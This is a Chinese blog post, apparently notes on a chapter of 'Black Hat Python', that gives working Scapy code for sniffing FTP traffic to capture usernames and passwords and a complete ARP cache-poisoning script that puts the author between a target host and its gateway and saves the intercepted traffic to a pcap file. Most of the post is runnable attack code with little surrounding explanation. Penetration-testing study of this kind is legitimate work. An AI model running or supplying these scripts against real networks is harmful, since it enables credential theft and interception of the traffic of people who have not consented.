Scapy窃取ftp登录账号密码

sniff函数的参数

filter 过滤规则,默认是嗅探所有数据包,具体过滤规则与wireshark相同。
iface 参数设置嗅探器索要嗅探的网卡,默认对所有的网卡进行嗅探。
prn 参数指定嗅探到符合过滤器条件的数据包时所调用的回调函数,这个回调函数以接受到的数据包对象作为唯一参数。
count 你需要嗅探的数据包的个数,默认无限个。
store 值为0 表示不再内存中保存原始包

建议在linux下使用scapy模块,运行时需要root权限

from scapy.all import *

# 数据包回调函数

def packet_callback(packet):

    print(packet.show())

# 开启嗅探器

sniff(prn=packet_callback, count=1)


from scapy.all import *

from scapy.layers.inet import TCP, IP

def packet_callback(packet):

    # 判断数据包在TCP层是否有负载(数据)下图中的load

    if packet[TCP].payload:

        ftp_pack = str(packet[TCP].payload)

        # 检查数据中是否含有user,pass字符串

        if "user" in ftp_pack.lower() or "pass" in ftp_pack.lower():

            print("[*] Server: %s" % packet[IP].dst)

            print("[*] %s" % packet[TCP].payload)

sniff(filter="tcp port 21", prn=packet_callback, store=0)

利用Scapy进行缓存投毒

import os

import sys

import signal

import threading

from scapy.all import *

from scapy.layers.l2 import ARP, Ether

interface = "ens33"  # 网卡

target_ip = "192.168.1.100"  # 被欺骗主机的IP

gateway_ip = "192.168.1.1"  # 网关

packet_count = 1000  # 发送数据包次数

poisoning = True  # 是否进行投毒

# 定义重置网络函数,当ARP投毒结束后,还原网络状态

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):

    # 以下代码中调用send函数的方式稍有不同

    print("[*] Restoring target...")

    # 首先使用ARP()构造arp数据包,op=2 表示这是ARP应答包,psrc,pdst表源IP与目的IP,hwdst,hwsrc表源目mac,最后使用send方法发送构造好的ARP应答包count=5表发送5次

    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)

    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

    # 发送退出信号到主进程

    os.kill(os.getpid(), signal.SIGINT)

# 定义获取MAC函数,用于获取被欺骗主机与网关的MAC地址

def get_mac(ip_address):

    response, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)

    # 返回从响应数据中获取的MAC地址

    for s, r in response:

        return r[Ether].src

    return None

# 定义投毒函数,对网关与主机进行欺骗

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):

    global poisoning

    poison_target = ARP()

    poison_target.op = 2

    poison_target.psrc = gateway_ip

    poison_target.pdst = target_ip

    poison_target.hwdst = target_mac

    poison_gateway = ARP()

    poison_gateway.op = 2

    poison_gateway.psrc = target_ip

    poison_gateway.pdst = gateway_ip

    poison_gateway.hwdst = gateway_mac

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")

    while poisoning:

        send(poison_target)

        send(poison_gateway)

        time.sleep(2)

    print("[*] ARP poison attack finished.")

    return

# 设置嗅探的网卡

# conf是在scapy库中声明的一个Conf类,在config.py中

conf.iface = interface

# verb:详细级别,从0到3,越高越详细

# 关闭输出

conf.verb = 0

print("[*] Setting up %s" % interface)

gateway_mac = get_mac(gateway_ip)

# 判断是否获得网关MAC

if gateway_mac is None:

    print("[!!!] Failed to get gateway MAC. Exiting.")

    sys.exit(0)

else:

    print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)

# 判断是否获得被欺骗主机MAC

if target_mac is None:

    print("[!!!] Failed to get target MAC. Exiting.")

    sys.exit(0)

else:

    print("[*] Target %s is at %s" % (target_ip, target_mac))

# 启动ARP投毒线程

poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))

poison_thread.start()

# 开启嗅探器,捕捉相关数据包

try:

    print("[*] Starting sniffer for %d packets" % packet_count)

    bpf_filter = "ip host %s" % target_ip  # BPF过滤规则

    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)

except KeyboardInterrupt:

    pass

finally:

    # 将捕获的数据包保存到arper.pcap方便wireshark查看

    print("[*] Writing packets to arper.pcap")

    wrpcap("arper.pcap", packets)

    # 停止投毒 因为线程共享变量

    poisoning = False

    # 阻塞等待正在投毒的线程退出

    poison_thread.join()

    # 恢复网络

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

    sys.exit(0)

python黑帽子(第四章)的更多相关文章

  1. python黑帽子(第五章)

    对开源CMS进行扫描 import os import queue import requests # 原书编写时间过于久远 现在有requests库对已经对原来的库进行封装 更容易调用 import ...

  2. python黑帽子(第三章)

    Windows/Linux下包的嗅探 根据os.name判断操作系统 下面是os的源码 posix是Linux nt是Windows 在windows中需要管理员权限.linux中需要root权限 因 ...

  3. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  4. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  5. python学习心得第四章

     python 学习心得第四章 1.lambda表达式 1:什么是lambda表达式 为了简化简单函数的代码,选择使用lambda表达式 上面两个函数的表达式虽然不一样,但是本质是一样的,并且lamb ...

  6. 进击的Python【第十四章】:Web前端基础之Javascript

    进击的Python[第十四章]:Web前端基础之Javascript 一.javascript是什么 JavaScript 是一种轻量级的编程语言. JavaScript 是可插入 HTML 页面的编 ...

  7. 《Python CookBook2》 第四章 Python技巧 对象拷贝 && 通过列表推导构建列表

    (先学第四章) 对象拷贝 任务: Python通常只是使用指向原对象的引用,并不是真正的拷贝. 解决方案: >>> a = [1,2,3] >>> import c ...

  8. [Python学习笔记][第四章Python字符串]

    2016/1/28学习内容 第四章 Python字符串与正则表达式之字符串 编码规则 UTF-8 以1个字节表示英语字符(兼容ASCII),以3个字节表示中文及其他语言,UTF-8对全世界所有国家需要 ...

  9. 《零压力学Python》 之 第四章知识点归纳

    第四章(决策和循环)知识点归纳 if condition: indented_statements [ elif condition: Indented_statements] [else: Inde ...

随机推荐

  1. BLHeli/ BLHeli_S开源无刷电调学习记录

    BLHeli的历史轨迹:BLHeli -> BLHeli_S -> BLHeli_32,我们重点学习BLHeli_S版本. 该代码支持常规的1-2ms脉冲宽度输入,以及Oneshot125 ...

  2. Prometheus由于时间不同步导致数据不显示

    原文链接:Prometheus由于时间不同步导致数据不显示 问题 部署 prometheus 后,访问前端界面发现: 这是由于你windows机器与部署prometheus服务器的时间不同步导致的. ...

  3. Java线程通信

    Java线程通信 螣蛇乘雾,终为土灰. 多个线程协同工作完成某个任务时就会涉及到线程间通信问题.如何使各个线程之间同时执行,顺序执行.交叉执行等. 一.线程同时执行 创建两个线程a和b,两个线程内调用 ...

  4. 【死磕NIO】— 探索 SocketChannel 的核心原理

    大家好,我是大明哥,一个专注于[死磕 Java]系列创作的程序员. [死磕 Java ]系列为作者「chenssy」 倾情打造的 Java 系列文章,深入分析 Java 相关技术核心原理及源码. 死磕 ...

  5. 网络编程-Python的netaddr库

    In [1]: from netaddr import * In [2]: ip = IPAddress('172.16.100.39')   ip.format()ip地址的格式化 '172.16. ...

  6. 如何集成 Spring Boot 和 ActiveMQ?

    对于集成 Spring Boot 和 ActiveMQ,我们使用依赖关系. 它只需要很少的配置,并且不需要样板代码.

  7. SpringBoot打包成可执行的Jar文件

    需要时SpringBoot项目 通过创建可以在生产环境中运行的完全独立的可执行jar文件来结束示例.可执行jar(有时称为"胖jar")是包含您的已编译类以及代码需要运行的所有ja ...

  8. SpringCloud个人笔记-04-Stream初体验

    sb_cloud_stream Spring Cloud Stream 是一个构建消息驱动微服务的框架 应用程序通过 inputs 或者 outputs 来与 Spring Cloud Stream ...

  9. 设置IE的自动导包器

    一丶打开IE设置: 快捷键:Ctrl+Alt+S 二丶将Add unambiguous imports on the fly 选中即可: 三丶设置好后别忘了"OK":

  10. C语言类型转换原理

    C语言类型转换 int a; a=1.23 这里把1.23赋值给a发生了隐式转换,原理如下: int a; float b=3.14; a=b; b赋值给a的过程:首先找一个中间变量是a的类型(该例中 ...